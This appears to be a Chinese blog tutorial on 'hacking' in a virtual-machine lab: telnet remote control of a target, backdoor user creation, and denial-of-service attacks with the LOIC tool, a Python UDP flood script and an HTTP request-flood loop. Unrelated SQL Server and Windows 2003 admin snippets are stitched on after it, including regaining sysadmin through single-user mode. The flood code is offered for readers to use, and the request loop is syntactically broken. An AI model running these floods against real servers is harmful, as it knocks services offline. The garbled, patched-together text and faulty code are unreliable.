首先先说下我写这些文章的目的.我的专业就是网络安全,因此,也愿意把自己所学的一些东西都分享出来.不过由于涉及到很多黑客的东西,一些软件我就不发了,脚本什么的你们可以拿去用.

更多的是为了给大家普及一下管于黑客的知识,以及如何防范黑客.这是我写的第一篇文章,希望能给你们带来一些启发.

实验环境:三台虚拟机,win7,win7,win2003,并且要关掉所有的防火墙
一.telnet远程登录
1.实验环境搭建
实验环境:攻击机win7,靶机win2003

telnet是windows里面的一个服务.基本windos都会自带这个服务,但是需要进行开启才可以.这个命令就类似于将对方的cmd复制到本地,攻击机输入的任何命令靶机都会执行.

有多厉害,就不需要我来说了吧.

这个命令需要攻击机和靶机都开启telnet命令才可以,不然就会出现下面这种情况:



会显示不是内部命令.因此需要开启这个服务.如图,我使用的攻击机是win7,开启的方法如下:

控制面板->程序和功能->打开或关闭windows功能->telnet服务器,telnet客户端都选择



我的靶机是win2003,开启的方法类似,在这里就不赘述了.这一步是必须要做的,不然在后面的连接会出现端口23未开启的问题.开启后的效果如图,记得一定要点击启动.


2.验证服务是否开启成功
在你的攻击机上面输入命令:
telnet /help

这时候会提示:



此时,你的telnet服务就开启成功了,可以进行下一步操作.
3.开始使用telnet进行远程连接
在开启win2003后,win7中首先输入第一条命令:
ping ip

此处的IP填写你靶机(win2003)的IP
如果发现可以ping通,进行下一步,如果发现ping不通,就说明网络的问题,解决了在进行下一步.

依次输入命令:
telnet 靶机ip

接着会提示一个是否确认的字符,输入y.

在输入你靶机的用户名和密码,如果按着步骤来的话,会出现下面的界面:



很好,此时你已经连接上你的靶机了,接下来你就可以使用命令来为所欲为了,比如创建用户,就是俗称的留后门,以及各种各样的操作.当然,步骤比较简单,是因为我们把自己的电脑的防护都降低到了最低.而真正的黑客会提前往你电脑里执行个脚本,将所有的防护自动关闭.想学的童鞋可以给个关注,以后我会写.
二.dos攻击

dos攻击虽然听着很厉害,但如果理解了以后就发现其实也就是那么回事.

dos攻击又称拒绝服务攻击,实现的方法有很多,这篇文章里面就写了三种实现方式.前面我会介绍用软件实现dos攻击,后面我会上代码来实现这种攻击.

软甲我就不发了,违法行为咱也不敢干,相信你们也不想见到我被封号

1.软件实现
比较出名的软件有"低轨道离子加农炮".上截图:


上面打红线的地方是输入你靶机的IP,然后点击lock on.下面有配置选项,记得把端口改成你靶机开放的端口,不然攻击是没有效果的.点击右边2.READY里面的那个按钮,攻击就开始了.

效果我就不演示了,我当时换成udp模式以后靶机直接死机.用wireshark抓包以后,全都是arp的包.
二.代码实现
1.udp泛洪攻击
这个原理就是发送大量的udp无用包,最后使服务器无法进行响应而死机.直接上代码:
from socket import *
import random

st = socket(AF_INET, SOCK_DGRAM)
bytes = '123'
ip =''
port = 1
sent = 0

print("UDP flood attack is about to begin...")

while True:
    st.sendto(bytes, (ip, port))
    sent += 1
    port += 1
    print("Sent %s packet to %s throught port:%s" % (sent, ip, port))
    if port == 65534:
        port = 1


这个是python的代码.用的时候记得把ip填上.当执行以后,会循环向每个端口建立连接请求,最后堵死每个端口.但是由于仅仅使用的是单线程,因此效果没有太明显.下面的图是脚本运行以后的截图,可以发现都不需要过滤都能抓到一堆arp包.


2.cc攻击
准确上来说,下面这段代码并不是cc攻击,而是利用爬虫的requests模块进行对网站的访问.当访问量足够大的时候,就会使服务器崩溃.因此我将其分类为cc攻击.
import reqests
ip=""
while 1=1
	requests.get("http://"+ip)

使用时记得加上靶机的ip.这个代码也是单线程的,可以用线程模块写成多线程的.

下面是抓包的结果.



如图,抓到的包都是tcp响应包.可以证明程序运行成功,不过由于量不够大,仍然无法使服务器崩溃.

写个总结吧.这次我只写了两个内容,telnet命令的使用,以及dos攻击的一些手段,内容比较简单,不过仍然需要好好看看.

不多说了,就这样吧.如果觉得有需要的话可以点个关注啥的,有兴趣的话可以加我q:1392969921

具体解决步骤:
第一步:
打开 SQL2005 先用Windows身份登录,然后在服务器名处右击选属性>安全性>右边的登录方式选项改为 Sql Server and Windows 身份验证 确定! 
     
 
第二步:
选择安全性(展开)>登录名>双击sa>密码改成你需要的密码 确定! 
 
然后关掉SQL2005 或者 断开连接 
 
第三步:
还是在双击"sa"弹出的窗口中,选择"Status",将其"Login"设为"Enabled"
(上次漏写了这一步...) 若缺少这一步,则会报"该账户被禁用"的错.

 
 
第四步:
点开始>程序>选择SQL2005>配置工具>打开 configuration manager>展开 SQL Server2005 网络配置 
   
注意:TCP/IP 与上面的Named Pipes都启用.
 
然后把SQL2005 的服务重新启动一下!

转载于:https://www.cnblogs.com/gppblog/archive/2010/03/15/1686756.html

windows2003下禁止用户远程登录的方法如下：
 
打开控制面板--管理工具，打开
 
安全策略-->本地策略-->用户权限分配-->通过终端服务拒绝登录，在里面添加想要禁止远程的用户可以达到让这个账户无法远 程
 
关掉后可以用刚才添加的那个用户远程一下，看看是不是不可以远程了？
 
至此就完成了禁止用户远程登录
 
我一般都是使用一些管理员账户来执行一些特殊的任务，但是不需要这些用户来远程登录系统，所以这种用户远程登录方法非常实用，也降低了了服务器安全 方面的风险

作为一名DBA，你的职责就是保证数据的安全，为了达到安全要求，你移除了BUILTIN\Administrators组，禁用了sa登录名，修改了服务器端口，删除了所有的sysadmin权限的登录名，你可以连接到SQL Server实例，但是却没有sysadmin的权限，遇到这种情况的时候该如何解决？

新鲜出炉的答案来啦！！！

1、停止SQL Server服务，同时关掉SQL Server代理服务。

2、打开cmd命令，输入net start MSSQLSERVER(服务名) /m，“/m”为进入单用户模式。

3、继续输入命令“sqlcmd”，进入sql命令行模式。

4、输入命令“exec sp_addsrvrolemember ‘WIN-XXXXX\Administrator’, ‘sysadmin’;”，换行再次输入“GO”，然后Enter执行，为Administrator账户授予sysadmin权限。

5、之后使用Administrator账号采用Windows模式登陆然后修改sa的密码即可。

6、做完以上操作后重启一下SQL Server服务，取消单用户模式。